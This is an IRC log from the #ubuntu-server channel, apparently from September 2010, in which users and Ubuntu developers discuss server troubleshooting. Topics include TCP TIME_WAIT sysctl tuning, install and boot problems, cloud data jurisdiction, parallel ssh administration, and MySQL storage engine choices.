<SpamapS> oh that will probably solve your problem
<SpamapS> tcp_fin_timeout should be totally safe at 30
<SpamapS> tcp_tw_reuse will cause the network stack to re-use the same connections that are in TIME_WAIT rather than wait for them to be completely destroyed
<SpamapS> tcp_tw_recycle will do it even more aggressively
<SpamapS> Kaelten: give reuse a try, if it solves your issue, let it be. recycle should be fine too, but it is known to break *some* programs that depend on tcp behaviors being 100% rfc compliant
<Kaelten> cool thanks for the input
<Kaelten> SpamapS: sidenote, should I set these things on the client or the server or both?
<SpamapS> Kaelten: wherever the TIME_WAIT's are stacking up
<Kaelten> k
<Kaelten> thanks
<SpamapS> any time
 * RoyK found a rather old computer at work today http://oldcomputers.net/ibm5155.html only pimped up with  640kB RAM, a 10MB harddrive and an 8087 FPU :D
<Patrickdk> nice, reminds me of my kaypro :)
<Patrickdk> http://oldcomputers.net/kayproii.html
<RoyK> hehe
<RoyK> two full-height floppy drives!
<RoyK> 5 1/4"?
<Patrickdk> yep
<Patrickdk> some of them had optional 10mb drives, but mine was as in the picture
<Patrickdk> the top picture :)
<RoyK> strange thing, the IBM came the year after
<RoyK> only 4,77MHz IIRC, but with tonnes of RAM
<Patrickdk> hheh, tons == >64k :)
<Patrickdk> http://oldcomputers.net/ti994.html
<Patrickdk> used one of them for years too
<RoyK> well, 640 = 10x64
<Patrickdk> hmm, it doesn't show the expantion chassis though
<RoyK> I booted the box, and it turned out it was running PC DOS 2.10 booting http://en.wikipedia.org/wiki/Idris_(operating_system)
<RoyK> running some meteorological app with serial i/o at about 1200 baud
<RoyK> well, supported up to 9600
<Patrickdk> the kaypro2 did 9600, send only, it could only receive at 2400 (maybe 4800 not sure)
<RoyK> IIRC the 8250 supported more than 9600, but that depended on the software
<YankDownUnder> Super Z-Modem!
#ubuntu-server 2010-09-08
<timmy> hi, anyone on?
<timmy> does anyone chat in this chat room?
<SpamapS> yes
<timmy> hi spam
<tanathos> hi all
<timmy> hi tan
<timmy> i have a question about 64-bit 10.04 install....
<timmy> install won't mount the cd/dvd drive.  tried everything on the Ubuntu site and forums
<timmy> some help is cryptic, like "there should be an entry for /dev/cdrom...", but doesn't say what to do if not!
<timmy> HP does not have any drivers except win7...there are no IDE ports to try an older cd....
<SpamapS> drivers for a cd drive?
<SpamapS> Thats pretty standard/generic hardware.. why would it need special drivers?
<timmy> no idea...blueray/dvd/cd combo...
<timmy> boots to graphical install menu, gets past "kb identification", won't recognize or mount the cd/dvd
<timmy> it is a sata device...apparently is seeing the sata hd
<timmy> tried changing controller to "ide" in bios, same effect
<SpamapS> have you asked in #ubuntu?
<timmy> yes, they said "go to #ubuntu-server"...it is 64-bit server edition on cd from Ubuntu
<timmy> fedora 13 32 bit loaded fine
<timmy> win2k3 server needed bios set to "ide" for some reason
<timmy> attempting to overwrite those installs with 64-bit ubuntu server 10.04
<SpamapS> timmy: probably worth posting it as a bug report
<SpamapS> timmy: if somebody else has your same identical hardware, they can confirm or help out.
<timmy> someone has...nothing done yet...
<timmy> everything says "try install from usb..."  that seems silly tho
<timmy> may have to try it, or get a pci-e ide controller to run a different cd rom.
<SpamapS> honestly, its pretty silly to install from spinning discs when you can just install from a solid state drive that is light weight and reusable.
<uvirtbot> New bug: #632791 in whois (main) "upgrade fails: trying to overwrite '/usr/bin/mkpasswd', which is also in package mkpasswd 5.0.6ubuntu1" [Undecided,New] https://launchpad.net/bugs/632791
<timmy> but spam...that is the entire problem not only with linux, but with it in general:
<timmy> a cd should just run the prog...period.  like turning a channel on a tv.
<timmy> if SSD is way to go, they should offer that as media
<SpamapS> the BIOS runs the program
<SpamapS> the BIOS is written by the HW manufacturer, and has its own set of drivers to read from the CD
<timmy> it is as if it would be acceptable to get a car, then be told "it won't start? oh, well just put a space shuttle engine in it...it's not hard"
<SpamapS> now, the CD SHOULD be playing nice as a normal SATA disc drive
<SpamapS> so its kind of weird that the kernel can't see it as such
<timmy> but the bios did its job
<timmy> i just don't get why there isn't a generic cd driver that would work....like vga is to vid, you know?
<timmy> THANKS FOR YOU TIME ANYWAY.
<SpamapS> in this case, somebody paid the car manufacturer to design and engineer it to work in a given set of parameters
<SpamapS> your frustration is understandable completely
<tm0> Hi everyone. Can anyone give me a hand with Ipfw?
<SpamapS> I'm in total agreement that it doesn't make sense that this particular CD drive wouldn't work
<SpamapS> timmy: for your car analogy, Linux is like putting an after market chip in the car's computer systems. Sure everything *should* work as expected.. but the people who made the car probably didn't test it on your custom chip. ;)
<smoser> mathiaz, did you open a bug ?
<SpamapS> timmy: I have to run. Good luck with your issue (and I really do suggest trying a USB key. you should be able to make one from the server cd iso.. )
<monokrome> Hey. RackSpace uses lame mirrors. Does anyone know how to change my mirror easily?
<jjk9> hello. why does samba appear to be missing ldapsam built in by default on ubuntu samba 3.4.7?
<tm0> Hi everyone. Can anyone give me a hand with Ipfw?
<Tim_R> does anybody know how to update root to user on mysql
<twb> What does "update root to user" mean?
<Tim_R> well change root to user
<Tim_R> for mysql
<Tim_R> nvm I just created a new user
<twb> You know how 2TB drives changed the block size from 512b to (IIRC) 2kB?
<twb> Will my hardy server Just Work with such drives?
<twb> Make that 4kB blocks.
<kklimonda> twb: I know there has been some work done during karmic or lucid cycle to improve support for such disks. I'm not sure if it has been backported to hardy.
<uvirtbot> New bug: #632863 in bacula (main) "package bacula-director-mysql 5.0.1-1ubuntu1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/632863
 * twb reads http://public.dhe.ibm.com/software/dw/linux/l-4kb-sector-disks/l-4kb-sector-disks-pdf.pdf
<twb> IIUC the bottom line is that 1) if you buy something labelled "Advanced Format", it has a firmware layer that presents 512b sectors to the OS; and 2) such a drive will Just Work, but will perform significantly better if you take the time to align on the invisible 4k boundaries.
<vanirahto> hi all
<YankDownUnder> Don't mind everyone rushing in to say hello mate... :)
<vanirahto> lol.
<vanirahto> i see
<YankDownUnder> ...might be overwhelming...
<vanirahto> no doubt..well, here is the thing..i have just gotten the love of taking over a ubuntu server and i've little experience in this domain..i think i have a networking issue as the server is slower than molasses
<vanirahto> when i do a netstat -s i see a lot of errors and such..so i'm not sure if the box is comprimsed or if there is a network setting error
<YankDownUnder> vanirahto, Slow in what respect - network response, or SMB or...??
<vanirahto> network response..
<vanirahto> like it takes forever to connect via ssh
<vanirahto> ping times are good
<vanirahto> can't use sftpd now either as it times out
<YankDownUnder> vanirahto, Well, you can check the /etc/resolv.conf and see what you're dealing with as far as DNS servers... => and as well, is this machine setup for a static ip?
<vanirahto> it has 2 ip addresses..one is dhcp and the second is static
<vanirahto> the ip i'm connecting to is dhcp
<YankDownUnder> Roger that...here's a question for ya - is both the static and dhcp setup for the same dns and all that wonderful jazz?
<vanirahto> yes indeed..that is all given by the hosting company
<vanirahto> i can send you the output of the netstat -s command
<vanirahto> if you like
<YankDownUnder> vanirahto, Ok...roger that...have you checked to see - and this may impact overall performance, what the contents of the /etc/sysctl.conf are like? Are they "generic" or have they been tweaked? Cuz you can eek out some performance on your network from some settings there...
<YankDownUnder> vanirahto, You can use the pastebin for that mate
<vanirahto> pastebin?  sorry but i'm really a newbie to this whole thing..first time w/irc et all
<vanirahto> am checking on the etc/sysctl.conf now
<YankDownUnder> Roger that...hang on...
<YankDownUnder> http://pastebin.ca
<YankDownUnder> vanirahto, http://www.ubuntugeek.com/performance-tuning-with-system-control-sysctl-in-ubuntu.html
<vanirahto> here is the post:  http://pastebin.ca/Yi7UHja4  password is ubuntu
<YankDownUnder> vanirahto, Far out - ok - firstly, you may want to change the box's root password. Then you may want to tweak the /etc/sysctl.conf => and apply the settings. Then you may want to check/reconfigure the firewall on this box. As well, you might want to double check/tweak the network settings and then restart the network. Check, also, if you've got enough memory/swap for giggles and grins. Turn off any services that are j
<YankDownUnder> ust, well, not used or not wanted.
<YankDownUnder> vanirahto, What version of Ubu is on this thing?
<vanirahto> right on..am checking on the version
<vanirahto> 2.6.16.53-070731a
<YankDownUnder> vanirahto, Do this in your console: cat /etc/lsb-release
<vanirahto> k
<vanirahto> DISTRIB_ID=Ubuntu
<vanirahto> DISTRIB_RELEASE=6.06
<vanirahto> DISTRIB_CODENAME=dapper
<vanirahto> DISTRIB_DESCRIPTION="Ubuntu 6.06.2 LTS"
<YankDownUnder> vanirahto, Egads - um...kinda a bit outdated that...however, you'd like to have this box stay up as long as possible with the least amount of work/time/effort.
<vanirahto> yeah..its an old box..never had any major problems w/it till recently when it started crawling
<YankDownUnder> That being the case, follow through with what I had told ya - tweak the /etc/sysctl.conf, tweak the firewall, tweak the network settings.
<YankDownUnder> vanirahto, I'll assume that first and foremost, especially on seeing the netstat output, that you're going to see an increase in performance just by tweaking the /etc/sysctl.conf and applying the settings - then restarting the network on that box
<vanirahto> right on..can you point me in the right direction to tweak the firewall and network settings?  i'm looking into the sysctl.conf now
<vanirahto> ok..i'll work on those points now..very odd though that just 2 days ago all was well on the box..
<YankDownUnder> Do the sysctl.conf firstly mate.
<vanirahto> right on!
<YankDownUnder> Could be that it's a target mate.
<vanirahto> i see a lot of entries for the sendmail mta when i do a ps -ef
<YankDownUnder> vanirahto, Have you audited the users? Check to make sure they're for-real - and check the mailboxes and forwarding and all that wonderful jazz?
<vanirahto> in the process
<vanirahto> have not done a full audit
<vanirahto> but i have a feeling that is what i'll be doing ALL night :(
<YankDownUnder> vanirahto, Paid by the hour, or salary? :)
<vanirahto> me?  man, thats a long long story there
<YankDownUnder> vanirahto, Hehehehe...been there done that mate.
<vanirahto> lol..me too..was hoping this would not be the second time around though
<vanirahto> short answer:  salary but DEF not enough
<vanirahto> lol
<YankDownUnder> For us, it's never ending.
<vanirahto> must be done i guess..
<vanirahto> ok..let me check on those things and i'll be back in a bit..are you online longer?
<vanirahto> its ur daytime now, eh?
<YankDownUnder> Yes - well, it's arvo here - might duck out for a bit, but mostly here (in my lab) all day...
<vanirahto> right on!  :)  thx!
<twb> Does vsftpd have internal per-user quotas, or is my only option normal filesystem quota(8) quotas?
<joschi> twb: the latter
<twb> Thanks
<twb> Anybody remember if you can leave the filesystem mounted (either -oro or -orw) while generating the initial aquota file?
<twb> *aquota.{usr,grp}
<huats> morning
<tanathos> mornin'
<twb> Are there any cloud weenies that have actually looked into the issues of data sovereignty and legal jursidictions?
<tanathos> ups, twb, this is not a easy one
<twb> OK, here's an easier one:
<twb> tmpfs defaults to a 50%-of-RAM cap
<twb> If I mount and fill two tmpfs, will RAM be 100% used or 50% used?
<soren> twb: No.
<soren> :)
<soren> twb: There's a difference between tmpfs and ramfs.
<uvirtbot> New bug: #632997 in mysql-dfsg-5.0 (universe) "package mysql-server-5.0 5.1.30really5.0.75-0ubuntu10.5 failed to install/upgrade: el subproceso post-installation script devolviÃ³ el cÃ³digo de salida de error 1" [Undecided,New] https://launchpad.net/bugs/632997
<soren> twb: tmpfs can be swapped out.
<twb> soren: *if* there's swap
<soren> twb: Sure.
<soren> twb: Well, if there isn't, then of course you're going to be 100% full.
<uvirtbot> New bug: #626723 in apache2 (main) "init script resets isig flag in an incorrect manner" [High,In progress] https://launchpad.net/bugs/626723
<soren> twb: Why wouldn't you?
<twb> I wondered idly if maybe tmpfs was cleverer than that
<soren> How could it be?
<soren> I mean.... What could it possibly do?
<twb> Some kind of shared pool with an overall cap as well as per-mountpoint caps
<soren> I doubt it.
<soren> ramfs might.
<soren> twb: Can you elaborate on your "data sovereignty and legal jursidictions" concerns?
<twb> OK, suppose I'm a multinational with a head office in, say, Zurich.
<twb> In my Zurich offices I have a machine room and a bog standard rack full of gear in it.
<twb> For most intents and purposes, I own the hardware, software, and data on it, and legal issues take place in a Zurich jurisdiction.
<twb> Now suppose I replace most of that with images running <somewhere> in a cloud provider's (e.g. amazon?) cloud
<soren> Mm hm.
<twb> Who does the data (for various values of "data") belong to?
<soren> Depends on the terms of service, I suppose.
<twb> If some flunky in .my decides his bribe wasn't big enough this week, and siezes a cloud node in his city which happens to be running your image or hosting part of your database, what happens?
<soren> It.. goes away?
<soren> I'm not sure what you mean.
<twb> soren: but is he allowed to look at it?  Is he allowed to sell all your secrets to another multinational?
<soren> twb: According to what? In most (all?) countries, stealing is illegal.
<shauno> personally, I think there's a time and a place for 'cloud'.  and if such concerns actually feature as part of your disaster recovery process, it may not be the place for you
<twb> Well, I'm not a multinational, but I know at least one that decided not to do cloud-y things because of such concerns
<soren> twb: Of course you need to trust the provider before you give them all your data.
<twb> soren: so know I need to know if such a scenario *is theft* according to... which jursidictions?  Mine?  My provider's head office?  Every country in which the cloud nodes live?
<soren> twb: Alternatively, you can set up an instancen at 10 different providers, run tahoe lafs on them, and scatter your data all about the place.
<soren> twb: Very likely the place where the nodes live.
<soren> twb: Everything else is an agreement between you and the provider. Or so I think.
<soren> IANAL.
<twb> So my original question is: has anyone actually thought that stuff through, maybe asked their lawyers, and written up a summary
<G> twb: I think the perfect question is what jurisdiction does the data come under etc, so w/ Amazon you'd likely have to obey w/ US laws, plus there is a chance that US Govt could order access to your data etc w/o you knowing (going from what I've read)
<lool> Hey, I just noticed that a vm I created with ubuntu-vm-builder from lucid creating a lucid vm was missing update-notifier-common which sets the APT:: confs for periodic updates; it's in the server seed though, is this normal?
<soren> twb: I don't know. I've never really cared about this stuff. Stuff can be illegal all it wants, that doesn't stop it from happening, so if I care about my data, I don't put it all in one place that I don't control.
<lool> (also, I can't join #ubuntu-virt, apparently it's on invite only?!)
<soren> lool: It's been discontinued. #ubuntu-virt, that is.
<soren> lool: It's been folded into this channel.
<G> One could liken it to owning a house... so say you own a house where you live, plus you own a house in US, and you have your US house stock piled w/ a heap of 'stuff', if the 'stuff' in your US house is illegal under US law, you'd be in trouble, but as far as people breaking in, you'd be protected under US law
<lool> soren: Thanks; and any idea about the vm-builder question?  :)
<soren> lool: vmbuilder doesn't install the server seed.
<incorrect> I would like to put RSA/DSA public keys into my ldap server, is there an easy way to do this with ubuntu?
<G> twb: thats my take on it anyway
<twb> Perhaps where I said legality, I should've said trust
<lool> soren: BTW the other day on #openstack, I asked whether there is a new tool to create VMs for openstack; someone from rackspace at debconf told me that was the case which quite surprized me
<soren> lool: That's the first I've heard of it.
<soren> lool: I know of no such tool.
<soren> lool: eevans?
<lool> I'm not sure; sysadmin smoking a lot  :-)
<lool> I mean cigarettes
<soren> twb: Can you restate your question with that modification? I can't work it out.
<soren> lool: I figured :)
<twb> Maybe "When migrating from a conventional server room to a cloud, how do you continue to avoid being taken for a ride by arbitrary governments and/or organizations around the world?"
<tanathos> lool, we all smoke a lot
<lool> very unhappy about Ubuntu lucid breaking under his feet because it was before the release
<tanathos> :))
<G> twb: answer, you can't :)
<soren> twb: The same way you do so for anything you outsource.
<G> twb: you've just can to research and take your cloud where the laws are acceptable
<G> (to you that is)
<soren> Again: I don't get this.
<soren> Being illegal doesn't actually stop stuff from happening.
<twb> G: so can I say to e.g. Amazon "please only host my data and images in the following countries" ?
<G> twb: well w/ say Amazon you can choose which buckets you want your data hosted in
<soren> twb: The locations of their hosting facilities are well-known.
<soren> twb: Somewhat, at least. It's known which state they're in.
<G> twb: but remember they are a US company, so they may have to obey US Search Warrants for international buckets anyway
<soren> twb: Same for Rackspace, btw.
<G> twb: well not have to, but they may do it anyway, to prevent pressure in other places
<soren> I seriously doubt that if the FBI wanders into Amazon's data centre saying "we've got a warrant to search your facilities" that Amazon can say
<soren> "oh, no, you can't do that. there's stuff in there that belongs to people from other countries."
<soren> that's not how search warrants work, I think.
<G> soren: sure, but what I'm talking about is buckets located in their EU zone etc
<soren> G: Ah.
<G> soren: US Patriot Act apparently has some weird super-secret-warrant provisions
<G> soren: as mentioned in: http://www.rsync.net/resources/notices/canary.txt
<soren> It's all pretty simple, really. Deal with the fact that the provider has access to whatever you give them access to. If that's a problem in itself, being illegal or their being accountable doesn't change anything in terms of being sure your data is safe.
<soren> An attacker just have to be slightly more cunning. There's cunning people everywhere.
<G> yeah
<soren> Some people are happy if they can just encrypt their block devices.
<soren> That way, someone stealing the physical disk doesn't get anything.
<soren> ...but someone with access the hypervisor can do whatever they want.
<Guest49864> hi, i'm having trouble updating php
<Guest49864> i think i have the wrong sources in apt-get
<uvirtbot> New bug: #633054 in ipmitool (universe) "ipmitool TSOL buffer overflow" [Undecided,New] https://launchpad.net/bugs/633054
<zul> morning
<shringo> zul: Morning
<uvirtbot> New bug: #633129 in mysql-5.1 (main) "mysql-client-5.1 no longer uses readline :(" [Undecided,New] https://launchpad.net/bugs/633129
<uvirtbot> New bug: #633138 in php5 (main) "package libapache2-mod-php5 5.3.2-1ubuntu4.2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/633138
<uvirtbot> New bug: #565238 in drbd8 (main) "drbdadm segfaults as non root user " [Wishlist,Opinion] https://launchpad.net/bugs/565238
<permalac> hello
<permalac> i would like to export the X from a server tu use wireshark
<permalac> i've installed  xserver-utils
<permalac> but it says me xhost unable to open display ":0.0"
<permalac> which packages do I need on the server side to export X?
<patdk-wk> export X?
<hallyn> ttx: man bug 584048 is just a royal mess.  I only just realized that two of the commenters were not the same people bc one is using libvirt and one is not.
<uvirtbot> Launchpad bug 584048 in qemu-kvm "kvm images losing connectivity w/bridged network" [High,Fix committed] https://launchpad.net/bugs/584048
<hallyn> I'm going to have to force myself to be MUCH stricter about that
<ttx> arh
<hallyn> (in my defense it dates back long before me, but that's no excuse)
<ttx> hallyn: handling bug noise takes a bit of experience
<hallyn> ttx: so, i want to mark it as only valid for lucid.  hints?
<hallyn> (actually, as 'incomplete' for lucid)
<ttx> hallyn: you need to have maverick and lucid tasks open. You probably can't do that yourself. i'll fix it
<ttx> then you can close the maverick task and set the lucid one to incomplete
 * ttx approves lucid nomination
<ttx> hallyn: now you have two tasks
<ttx> hallyn: just mark the lucid one incomplete and the maverick one invalid, if that's what makes sense
<hallyn> ttx: thanks!
<ttx> hallyn: no pb
<saulus> I am using ubuntu 10.04 - server with / and /boot on an lvm2(on raid1( on /dev/sda & /dev/sdb) ). After I did a dist-upgrade from the fresh installation the kernel does not recognize my /dev/sdb (and thus the follow-up devices). Grub tells me "waiting for root device". Any ideas?
<daxroc> Afternoon all
<daxroc> Any one have any suggestions for mirrioring files in realtime ( or close ) ?
<daxroc> *inside openvz containers running ubuntu10.04
<elb0w> I am trying to setup my system to run on NTP but the NTP is about 10+ minutes fast
<patdk-wk> run on ntp?
<elb0w> sorry?
<patdk-wk> ntp isn't fast, what ever server you connected to might be
<patdk-wk> what is your ntp config?
<elb0w> the ntpdate should auto sync it though
<elb0w> stock
<patdk-wk> is ntp running?
<elb0w> but I ran ntpdate ntp.ubuntu.org
<elb0w> yes
<patdk-wk> ntpdate doesn't do crap if ntp is running
<joschi> elb0w: don't use ntpdate. that'll only synchronise once (or in certain intervals if run by cron). use ntpd or openntpd instead
<elb0w> looks like it just synced
<elb0w> odd
<joschi> elb0w: ntpd will also take care of clock drift, which ntpdate can't
<hallyn> mathiaz: so AIUI it's still not possible to have personal blog posts auto-list under ubuntu server blog, right?
<elb0w> yeah its working now, thats weird
<joschi> daxroc: local replication or over network?
<shringo> ttx: have you got 10 to discuss bug 452900 and bug 452910?
<uvirtbot> Launchpad bug 452900 in asm2 "Please run testsuite during build" [Medium,Triaged] https://launchpad.net/bugs/452900
<uvirtbot> Launchpad bug 452910 in asm2 "Encoding javac and javadoc warnings during build" [Low,In progress] https://launchpad.net/bugs/452910
<daxroc> joschi: It's over local network ( gigE )
<joschi> daxroc: glusterfs would come to my mind. or drbd, but I'm not sure that'll work with openvz kernels
<daxroc> joschi: I've been looking at glusterfs but it seems to barf when run inside the containers.
<ttx> shringo: sure
<shringo> ttx: great - I've spent some time looking at the testsuite that ships with the asm2 source package.
<shringo> Its not in great shape; it executes with a number of failed tests; it slow.. bit time - it uses the rt.jar as part of testing which has over 17k classes in it
<shringo> and includes a number of performance comparison tests with bcel, serp and javassist; which would mean increasing the number of build dependencies where poss or removing this aspect of the testing from the source package.
<shringo> All-in-all looks like quite a bit of work to get running it running well - and I don't think that it will come from the upstream project - last release to asm2 was in 2006!
<saulus> from my /dev/sda, /dev/sdb, /dev/md0, /dev/mapper/lvm_foo* only the /dev/sda is listed. /dev/sdb is missing, thus the other layers cant start. After booting the kernel I always stick to busybox. What may be the issue. The revocery system from the cd does get the /dev/md0 after an additional check and the /dev/mapper/lvm* after a third one. Any ideas?
<shringo> Advice on where to go next with this appreciated :-)
<ttx> shringo: hmm
<ttx> I've enountered quite a few of those half-broken testsuites
<ttx> it depends how much are left when you disable the undesired ones
<ttx> if you end up with 10% of the test suite, obviously it's not worth the trouble
<ttx> if you end up with 80%, it's worth it...
<ttx> how realistic is it to try to converge to using the same version of asm ?
<ttx> we currently have in main 1.5.3, 2.2.3 and 3.2
<shringo> I had a look at the reverse dependencies (apt-rdepends generated some nice pictures for me) but I would need to assess the compatibility between asm3 -> 2.
<shringo> I've not looked at 1.5.3 yet!!!!
<ttx> the problem with asm is... usually it's embedded in code rather than just compiled against it
<ttx> (upstream)
<shringo> My personal take it that we could drop the performance tests - they are more of a 'look how great we perform compared to' type test.
<ttx> so they jarjar to include it in a subpackage
<ttx> in a different namespace
<ttx> debian undid that
<ttx> they usually patch so that it uses the system lib... and compile against it rather than include it
<ttx> if I make sense
<saulus> I currently am thinking about reinstalling if noone has a clue.
<ttx> so you end up with a strong dep on a specific version of asm, and they seem to be widely incompatible with each other
<shringo> It would be nice to converge on one version for platform; and then maybe take the jarjar approach for deviation from the platform version - I know this goes against policy but its got to be worth considering for this type of dependency
<shringo> Anyway - that feels like a conversation for another day - how about this for an approach
<shringo> a) assess how much of the test suite needs to be turned off to make it function
<shringo> b) If acceptable > 80% then proceed
<ttx> lets say 75% :)
<shringo> c) Identify an appropriate build dependency (something simple with just a few hundred classes) to run the tests against - rather than rt.jar with its 17k classes
<ttx> about the added build-deps: it's ok as long as they are in main too
<shringo> Ok - i'll pick one from main - should not be to tough!
<ttx> i'd not do a MIR (main inclusion request) just to enable 5% more of a testsuite
<ttx> espcially a broken one
<shringo> MIR's are presumably required for inclusion into Maverick from now until release candidate?
<ttx> shringo: there are two theories. For one, MIRs fall under FeatureFreeze
<shringo> ttx: which was back in early August?
<ttx> https://wiki.ubuntu.com/MaverickReleaseSchedule
<ttx> Aug 12th
<shringo> Got that one; so it feels like this is not one for Maverick...
<ttx> shringo: like I said, I'd not ask for an exception to enable part of a testsuite
<shringo> ttx: fine - I guess the same applies for bug 452910 - it just general housekeeping
<uvirtbot> Launchpad bug 452910 in asm2 "Encoding javac and javadoc warnings during build" [Low,In progress] https://launchpad.net/bugs/452910
<ttx> yes, if it requires adding new packages to main, it probably should be postponed
<shringo> ttx: OK - thanks for the advice - I will tidyup the work I have done so far and park it for the time being.
<ttx> shringo: you might consider joining #ubuntu-java. It's quite dead, theoretical topic is Java packaging in Ubuntu, but sometimes the right discussion ofr question wil happen there
<tomsdale> I have a file in a directory with an 'unspeakable' filename. It appears to be a character encoding problem and I can't bring it up in bash completion. How can I delete such a file on the command line?
<tomsdale> To answer my own question - probably delete the directory with the file in it.
<hggdh> Daviey, zul: can I use the UEC rig?
<zul> hggdh: i think its ok with me
<hggdh> thanks
<zul> might want to check with daviey as well though
<hggdh> I did, got no response
<cemc> if I have a bunch of servers, and I want to run some command on them as root with parallel ssh, how can I accomplish this ?
<Daviey> hggdh, hey
<zul> hggdh: lemme know when you are done
<cemc> something along the lines: I upload one bash script which does stuff to all of them with parallel scp, then I run that script (somehow), with sudo or how? I can't really enter the password when sudo asks me
<hggdh> Daviey, zul: it will be about 4 hours -- testing the euca 1.6.2 lucid proposed
<ivoks> anyone knows a smart way to trace use of memory per process during life time of kernel?
<Daviey> hggdh, that is awesome.... however
<Daviey> do you think you'd be able to test without cemedek?
<nijaba> cemc: example at http://www.linux.com/archive/feature/151340
<hggdh> oh
<Daviey> cempedak ?
<zul> hggdh:ok
<hggdh> cempedak is already dead...
<hggdh> but I can free up one of the servers
<Daviey> hggdh, Oh.. no worries then :)
<hggdh> Daviey: sorry
<Daviey> Unless you don't *need* it?
<hggdh> no, I do not need *all* for volume testing
<hggdh> certainly not
<zul> hggdh: can you re-install them when you are done for me so I can work on what I was doing
<Daviey> hggdh, Ok.. which ones of these bad boys can we use?
<Daviey> zul, technically, we can re-provision them - but perhaps it would make sense for us not all to edit configs :)
<hggdh> so... you can use sapodilla & soncoya, I will restrcit myself to cemepdak, mabolo, marula, and santol
<Daviey> dammit, we are allowed the only ones i can't spell :)
<zul> heh...i need to eat
<Daviey> o/
<hggdh> Daviey: I will unset the PXE boot, then
<Daviey> hggdh, are sapodilla & soncoya on?
<hggdh> Daviey: no, not right now. Before rebooting, I have to unset PXE
<Daviey> hggdh, mv $tftroot/$macaddress .tmp ?
<hggdh> yeah
<Daviey> cool
<Daviey> hggdh, Can you let me know when it's booting pleasE?
<hggdh> Daviey: actually, the way it is set up there: rm sapodilla && ln -s default sapodilla
<Daviey> hggdh, Hmm.. wouldn't the PXE client work down the list - reaching default eventually?
<cemc> nijaba: I don't see any answers to my question there. I know the methods (pssh, clusterssh), I'm also using clusterssh at times, but I would like to be able to just run a command as root with pssh on the remote hosts. is there an easy way for that?
<hggdh> Daviey: it would, but this would mean that -- right now -- sapodilla and soncoya would end up with Lucid
<Daviey> cemc, That doesn't make much sense to me
<Daviey> ahhhh
<Daviey> hggdh, i see - i bow to your wisdom :)
<hggdh> :-)
<cemc> Daviey: say I have a 100 hosts, and I want to remove package X from all of them (without any interactive stuff like clusterssh)
<nijaba> cemc: I'm afraid you will need to allow root access from pssh or allow passwordless sudo.  none of them seem perfect. I would recommend using an ssh key in any case.
<Daviey> cemc, 'expect' or 'fab' (fabric) is what i would use :)
<cemc> nijaba: mhm, I thought of these, but I hoped there was a better way ;)
<cemc> Daviey: I'll take a look at those
<nijaba> cemc: not that I know of...
<hggdh> Daviey: sapodilla and soncoya are up. They should be in the same state you left them
<Daviey> hggdh, confirmed ; thanks
<saulus> I installed the linux-virtual package on LTS 10.04 and now my server does not find its discs anymore. Can you help?
<jpds> saulus: Why didn't you install linux-server ?
<saulus> jpds: I did
<saulus> Is it vserver compatible? I thought I get the vserver-compatibility with linux-virtual
<ivoks> saulus: did you uninstall -server?
<ivoks> never mind
<ruben23> how do i check for package that are installed on ubuntu server
<patdk-wk> dpkg --get-selections
<ruben23>  patdk-wk: its not working i got error message
<patdk-wk> then dpkg is screwed on your system
<patdk-wk> it should list everything, with installed, deinstalled, ...
<saulus> ivoks: I just tried. Now my initrd is missing. How can I get it back?
<ivoks> saulus: you tried what?
<saulus> ivoks: i tried to remove linux-server
<ivoks> no! why?!
<saulus> aeh, forget it. I ment I tried to remove linux-virtual.
<saulus> I misread your suggestion above: 18:25 < ivoks> saulus: did you uninstall -server?
<ivoks> if you still have -server, reboot and boot -server kernel
<saulus> I removed linux-virtual. Thus my kernel was gone. In /var/cache/apt/archieves I found the generic one and installed it. dpkg -i worked fine. But now my initrd.img-2.6.32... is missing.
<SpamapS> sommer: hey are you around? I'm wondering what the best way to tell users of MySQL that they should always use InnoDB is.. I'm thinking maybe we should add it to the server guide.
<patdk-wk> they should always use innodb?
<patdk-wk> I almost never use innodb, too slow
<SpamapS> You give up a lot of data security for that speed.
<saulus> How do I get initrd.img, if it is missing?
<patdk-wk> ya, lucky I don't care about data security :)
<patdk-wk> saulus, update-initramfs -u
<SpamapS> Also InnoDB can actually be a lot faster than MyISAM when tuned and given the proper resources.
<patdk-wk> spamapS, well, most of my use cases are logging applications
<SpamapS> patdk-wk: if you never update your tables, then MyISAM is great. ;)
<patdk-wk> ran the logger into innodb, horrible, myisam, no issues
<saulus> patdk-wk: did not do anything
<SpamapS> patdk-wk: yeah, if you never update/delete .. myisam is awesome, and actually is far less likely to lose data on crash.
<patdk-wk> and yes, I do know how to tune myisam and innodb
<patdk-wk> ya, never update/delete
<patdk-wk> the applications that do, those are innodb
<SpamapS> patdk-wk: did you try batching up the log entries into bigger transactions?
<SpamapS> patdk-wk: the issue with innodb is it has to double-write on little transactions..
<patdk-wk> SpamapS, actually, yes
<patdk-wk> the syslog logger, always did batching of like 50k rows
<patdk-wk> or 1second
<patdk-wk> the apache logger I modified to batch later on
<SpamapS> patdk-wk: if you never delete/update a from a myisam table, it has a special structure that is basically like a text file.. so you're just appending data with no computation/seek time at all..
<patdk-wk> yep
<SpamapS> patdk-wk: so yeah, for logging, its pretty good. But if you crash during a write.. you just have to wait for myisamchk to finish. ;)
<patdk-wk> na, rotate it :)
<SpamapS> patdk-wk: have you tried the archive engine? I've heard some people have better success with it because it does even less disk I/O since the data is compressed.
<patdk-wk> I rotate the logging db's daily, and compress/reindex them
<patdk-wk> no, I need indexs, and no index with archive
<SpamapS> ah
<SpamapS> patdk-wk: I think its worth it to suggest the *safer* option as the recommended option, and let people tune their way to MyISAM. ;)
<patdk-wk> would that include changing the mysql default engine to innodb?
<patdk-wk> just innodb tuning is so much harder than myisam
<SpamapS> patdk-wk: opening a bug report to suggest that right now. :)
<SpamapS> patdk-wk: Its not really.. increase buffer pool.. done. ;)
<patdk-wk> I would say, use innodb by default would be a good thing
<patdk-wk> I just wonder about user abilities for that case :(
 * patdk-wk doesn't think, more ram == optimization :)
<patdk-wk> in that case, why use a harddrive? :)
<ivoks> saulus: update-initramfs -u -k all
<SpamapS> patdk-wk: Drizzle, which is designed to be a *lightweight* database, has removed MyISAM completely.
<SpamapS> patdk-wk: MyISAM only achieves its high insert speed by doing things in a dangerous way. ;)
<patdk-wk> ya, I know :)
<SpamapS> patdk-wk: all the user tuning in the world is meaningless if their datacenter goes dark and they come back up without any data.
<saulus> ty, ivoks. Finally I got it working.
<patdk-wk> hmm, I use federated tables a lot, love them :) guess not a drizzle thing :)
